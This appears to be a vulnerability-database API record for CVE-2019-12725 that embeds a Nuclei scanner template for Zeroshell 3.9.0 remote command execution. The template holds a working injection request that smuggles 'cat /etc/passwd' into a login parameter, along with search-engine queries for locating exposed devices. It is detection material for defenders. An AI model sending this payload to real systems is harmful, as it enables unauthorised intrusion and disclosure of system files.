{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2019-12725/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2019-12725/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2019-12725/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2019-12725/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2019-12725/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2019-12725"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2019-12725"
    }
  },
  "data": {
    "nuclei": true,
    "nuclei_template": "http/cves/2019/CVE-2019-12725.yaml",
    "nuclei_template_severity": "critical",
    "nuclei_template_yaml": "id: CVE-2019-12725\n\ninfo:\n  name: Zeroshell 3.9.0 - Remote Command Execution\n  author: dwisiswant0,akincibor\n  severity: critical\n  description: Zeroshell 3.9.0 is prone to a remote command execution vulnerability. Specifically, this issue occurs because the web application mishandles a few HTTP parameters. An unauthenticated attacker can exploit this issue by injecting OS commands inside the vulnerable parameters.\n  impact: |\n    Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the target system.\n  remediation: Upgrade to 3.9.5. Be aware this product is no longer supported.\n  reference:\n    - https://www.zeroshell.org/new-release-and-critical-vulnerability/\n    - https://www.tarlogic.com/advisories/zeroshell-rce-root.txt\n    - https://github.com/X-C3LL/PoC-CVEs/blob/master/CVE-2019-12725/ZeroShell-RCE-EoP.py\n    - https://zeroshell.org/blog/\n    - http://packetstormsecurity.com/files/160211/ZeroShell-3.9.0-Remote-Command-Execution.html\n  classification:\n    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2019-12725\n    cwe-id: CWE-78\n    epss-score: 0.89849\n    epss-percentile: 0.99785\n    cpe: cpe:2.3:o:zeroshell:zeroshell:3.9.0:*:*:*:*:*:*:*\n  metadata:\n    max-request: 1\n    vendor: zeroshell\n    product: zeroshell\n    shodan-query: http.title:\"zeroshell\"\n    fofa-query: title=\"zeroshell\"\n    google-query: intitle:\"zeroshell\"\n  tags: cve,cve2019,packetstorm,rce,zeroshell,vkev,vuln\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/cgi-bin/kerbynet?Action=StartSessionSubmit&User='%0acat%20/etc/passwd%0a'&PW=\"\n\n    matchers-condition: and\n    matchers:\n      - type: regex\n        part: body\n        regex:\n          - \"root:.*:0:0:\"\n\n      - type: status\n        status:\n          - 200\n# digest: 4b0a00483046022100cee5a5f63cad46afd6d24b031a4dfaf20059a9c0b165c84d0a1af893cf95e1de022100e2610fe3185caeddf8c52bcbf3c876a3b662a0ae696675a291b2e5a9fb70eedc:922c64590222798bb761d5b6d8e72950"
  },
  "source": "nuclei",
  "vuln_id": "cve-2019-12725"
}